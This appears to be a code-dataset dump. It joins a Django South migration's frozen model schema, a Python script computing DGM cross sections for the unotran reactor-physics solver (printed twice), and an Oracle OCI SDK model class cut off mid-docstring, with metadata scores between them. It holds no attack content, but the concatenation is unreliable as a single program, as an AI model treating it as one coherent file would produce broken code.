'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.device': {
'Meta': {'object_name': 'Device'},
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'boot_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'cached_cost': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'cached_price': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'chassis_position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'connections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'through': "orm['discovery.Connection']", 'symmetrical': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dc': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'deprecation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deprecation_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.DeprecationKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'diag_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hard_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'logical_parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'logicalchild_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'management': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'managed_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.IPAddress']", 'blank': 'True', 'null': 'True'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mgmt_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'device_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.DeviceModel']", 'blank': 'True', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name2': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'purchase_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rack': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'sn': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'support_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'support_kind': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uptime_seconds': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'uptime_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'warranty_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.devicemodel': {
'Meta': {'object_name': 'DeviceModel'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'chassis_size': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '401'})
},
'discovery.discoveryqueue': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DiscoveryQueue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.environment': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Environment'},
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']"}),
'domain': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hosts_naming_template': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'next_server': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'queue': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DiscoveryQueue']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.ipaddress': {
'Meta': {'object_name': 'IPAddress'},
'address': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dead_ping_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Device']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'dns_info': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'http_family': ('django.db.models.fields.TextField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_buried': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_management': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_plugins': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_puppet': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Network']", 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'scan_summary': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['scan.ScanSummary']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'snmp_community': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'snmp_name': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'snmp_version': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'discovery.marginkind': {
'Meta': {'object_name': 'MarginKind'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'margin': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.network': {
'Meta': {'ordering': "(u'vlan',)", 'object_name': 'Network'},
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '18'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'custom_dns_servers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['dnsedit.DNSServer']", 'null': 'True', 'blank': 'True'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'dhcp_broadcast': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dhcp_config': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Environment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'gateway': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'null': 'True', 'blank': 'True'}),
'gateway_as_int': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignore_addresses': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.NetworkKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'last_scan': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'max_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'min_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'racks': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'symmetrical': 'False'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'reserved': ('django.db.models.fields.PositiveIntegerField', [], {'default': '10'}),
'reserved_top_margin': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'terminators': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.NetworkTerminator']", 'symmetrical': 'False'}),
'vlan': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'discovery.networkkind': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkKind'},
'icon': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.networkterminator': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkTerminator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'dnsedit.dnsserver': {
'Meta': {'object_name': 'DNSServer'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'unique': 'True', 'max_length': '15'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'})
},
'scan.scansummary': {
'Meta': {'object_name': 'ScanSummary'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'false_positive_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '36'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'previous_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'tags.tag': {
'Meta': {'object_name': 'Tag'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['account.Profile']"}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'tags_tag_tags'", 'to': "orm['contenttypes.ContentType']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'official': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'stem': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'related_tags'", 'null': 'True', 'to': "orm['tags.TagStem']"})
},
'tags.tagstem': {
'Meta': {'object_name': 'TagStem'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'tag_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
}
}
complete_apps = ['deployment'] | en | 0.751659 | # -*- coding: utf-8 -*- # Adding field 'ArchivedDeployment.service' # Adding field 'ArchivedDeployment.device_environment' # Adding field 'Deployment.service' # Adding field 'Deployment.device_environment' # Deleting field 'ArchivedDeployment.service' # Deleting field 'ArchivedDeployment.device_environment' # Deleting field 'Deployment.service' # Deleting field 'Deployment.device_environment' | 2.186032 | 2 |
SPH/sphbwr_example2.py | RLReed/unotran | 0 | 8562 | import numpy as np
import sys
sys.path.append('/homes/rlreed/workspace/unotran/src')
from coarseBounds import computeBounds, Grouping
import pickle
from makeDLPbasis import makeBasis as makeDLP
from makeKLTbasis import makeBasis as makeKLT
import sph
import sph_dgm
import pydgm
def buildGEO(ass_map):
fine_map = [1]
coarse_map = [1.26]
material_map = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [10]]
npins = len(ass_map)
cm = [0.0]
fm = []
mm = []
for i, ass in enumerate(ass_map):
mm += material_map[ass]
cm += coarse_map
fm += fine_map
cm = np.cumsum(cm)
return npins, fm, cm, mm
def makeDGMXS(G, refXS, dgmstructure, basisType):
if 'klt' in basisType:
makeKLT(basisType, dgmstructure)
else:
makeDLP(dgmstructure)
dgmstructure.fname = '{}_{}'.format(basisType, dgmstructure.fname)
fname = '_homo.'.join(xs_name.split('.'))
refXS.write_homogenized_XS(fname)
nPin, fm, cm, mm = buildGEO(pin_map)
dgm = sph_dgm.DGMSOLVER(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)
pydgm.dgmsolver.initialize_dgmsolver()
dgm.extractInfo()
pydgm.dgmsolver.finalize_dgmsolver()
pydgm.control.finalize_control()
nCellPerPin = dgm.phi.shape[2] // dgm.npin
return sph_dgm.XS(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)
if __name__ == '__main__':
np.set_printoptions(precision=6)
G = 44
dgmstructure = computeBounds(G, 'full', 1, 0.0, 1.3, 60)
fname = dgmstructure.fname
xs_name = 'XS/{}gXS.anlxs'.format(G)
pin_map = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
data_path = 'data2'
# Get the homogenized cross sections
refXS = pickle.load(open('{}/refXS_sph_space_{}.p'.format(data_path, G), 'rb'))
for basis in ['dlp', 'klt_full', 'klt_combine', 'klt_pins_full']:
dgmstructure.fname = fname
XS = makeDGMXS(G, refXS, dgmstructure, basis)
pickle.dump(XS, open('{}/refXS_dgm_{}_{}_h{}.p'.format(data_path, dgmstructure.fname, 'fine_mu', 0), 'wb'))
| import numpy as np
import sys
sys.path.append('/homes/rlreed/workspace/unotran/src')
from coarseBounds import computeBounds, Grouping
import pickle
from makeDLPbasis import makeBasis as makeDLP
from makeKLTbasis import makeBasis as makeKLT
import sph
import sph_dgm
import pydgm
def buildGEO(ass_map):
fine_map = [1]
coarse_map = [1.26]
material_map = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [10]]
npins = len(ass_map)
cm = [0.0]
fm = []
mm = []
for i, ass in enumerate(ass_map):
mm += material_map[ass]
cm += coarse_map
fm += fine_map
cm = np.cumsum(cm)
return npins, fm, cm, mm
def makeDGMXS(G, refXS, dgmstructure, basisType):
if 'klt' in basisType:
makeKLT(basisType, dgmstructure)
else:
makeDLP(dgmstructure)
dgmstructure.fname = '{}_{}'.format(basisType, dgmstructure.fname)
fname = '_homo.'.join(xs_name.split('.'))
refXS.write_homogenized_XS(fname)
nPin, fm, cm, mm = buildGEO(pin_map)
dgm = sph_dgm.DGMSOLVER(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)
pydgm.dgmsolver.initialize_dgmsolver()
dgm.extractInfo()
pydgm.dgmsolver.finalize_dgmsolver()
pydgm.control.finalize_control()
nCellPerPin = dgm.phi.shape[2] // dgm.npin
return sph_dgm.XS(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)
if __name__ == '__main__':
np.set_printoptions(precision=6)
G = 44
dgmstructure = computeBounds(G, 'full', 1, 0.0, 1.3, 60)
fname = dgmstructure.fname
xs_name = 'XS/{}gXS.anlxs'.format(G)
pin_map = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
data_path = 'data2'
# Get the homogenized cross sections
refXS = pickle.load(open('{}/refXS_sph_space_{}.p'.format(data_path, G), 'rb'))
for basis in ['dlp', 'klt_full', 'klt_combine', 'klt_pins_full']:
dgmstructure.fname = fname
XS = makeDGMXS(G, refXS, dgmstructure, basis)
pickle.dump(XS, open('{}/refXS_dgm_{}_{}_h{}.p'.format(data_path, dgmstructure.fname, 'fine_mu', 0), 'wb'))
| en | 0.745112 | # Get the homogenized cross sections | 1.872758 | 2 |
src/oci/management_agent/models/management_agent_aggregation_dimensions.py | CentroidChef/oci-python-sdk | 249 | 8563 | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
